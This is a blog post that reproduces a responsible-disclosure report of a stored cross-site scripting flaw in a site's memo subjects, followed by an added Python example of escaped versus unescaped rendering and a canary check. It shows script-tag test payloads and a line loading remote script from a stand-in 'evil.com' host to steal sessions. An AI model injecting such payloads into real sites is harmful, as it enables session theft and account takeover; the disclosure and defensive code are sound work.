Posted by sadistical
on Tue 1 Feb 05, 7:56 PM to sadistical's blog.
Seems like I can't stop doing security work even in my "time off". Here's a (fixed) security issue I reported to the site admins yesterday.
Kudos to them for fixing it so promptly and running such a good site...
----
Whilst experimenting with sending messages to people and myself, I couldn't help noticing a security problem in your current memo implementation.
Rather than abuse it I'm reporting it so that you can fix it.
Simply put, you filter javascript from the body of memos, but not from the subjects - this means that I can send a malicious memo to a user, and when they view their memo page javascript can automatically execute.
To test this for yourself simply send a memo to a user (such as yourself):
Subject: <script>alert(1);</script>
Body: <script>alert(2);</script>
You will see that when the memos page is loaded the script is automatically executed from the subject.
I suspect that the length is bounds-checked - but I imagine a suitably evil piece of code could be included with:
<script src="http://evil.com/blah.js">
This could redirect to the change password page, or log the session details.
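The root cause described above is a field that is escaped in one place (the body) and forgotten in another (the subject). The following is an added example, not code from the site or from this post: a small Python rendering routine that reproduces the "body escaped, subject not" flaw, the corrected version that escapes every user-controlled field at output time, and a per-field canary check of the kind the author ran by hand (send one memo, see which field comes back raw). The memo dictionary, the template markup and the function names are all constructed for the example.

```python
import html
import re

# Constructed sample memo (not taken from the original post): the subject
# carries the same kind of payload the post uses to demonstrate the bug.
SAMPLE_MEMO = {
    "subject": "<script>alert(1);</script>",
    "body": "<script>alert(2);</script>",
}


def render_memo_vulnerable(memo):
    """Mirrors the flaw in the post: the body is escaped, the subject is not.

    Any markup in the subject is emitted verbatim into the page.
    """
    return (
        f"<div class='memo'><h3>{memo['subject']}</h3>"
        f"<p>{html.escape(memo['body'], quote=True)}</p></div>"
    )


def render_memo_fixed(memo):
    """Escape every user-controlled field where it is written into HTML.

    html.escape turns < > & " ' into entities, so the browser renders the
    text instead of parsing it as a tag. Doing this at output time for
    every field removes the 'forgot one field' class of mistake entirely.
    """
    return (
        f"<div class='memo'><h3>{html.escape(memo['subject'], quote=True)}</h3>"
        f"<p>{html.escape(memo['body'], quote=True)}</p></div>"
    )


# Matches an unescaped opening or closing script tag in rendered output.
_RAW_SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def contains_live_script(rendered_html):
    """True if the rendered page still contains a raw (unescaped) script tag."""
    return _RAW_SCRIPT_TAG.search(rendered_html) is not None


def find_unescaped_fields(renderer, field_names):
    """Return the fields a renderer emits without escaping.

    For each field in turn, fill every field with harmless text, put a
    harmless canary tag in the one under test, and see whether the tag
    survives into the output unchanged. This is the defender's version of
    the manual 'send yourself a memo' test from the post.
    """
    canary = "<canary-probe>"
    leaking = []
    for name in field_names:
        probe = {n: "plain text" for n in field_names}
        probe[name] = canary
        if canary in renderer(probe):
            leaking.append(name)
    return leaking


if __name__ == "__main__":
    print("vulnerable renderer leaks:",
          find_unescaped_fields(render_memo_vulnerable, ["subject", "body"]))
    print("fixed renderer leaks:",
          find_unescaped_fields(render_memo_fixed, ["subject", "body"]))
```

The canary check is deliberately generic: it takes any renderer and any list of field names, so the same audit can be pointed at every template that writes user data into a page, not just the memo view. Note that the fix is output encoding rather than a blocklist on the word "javascript"; a filter that strips one keyword from one field is exactly how the subject ended up unprotected.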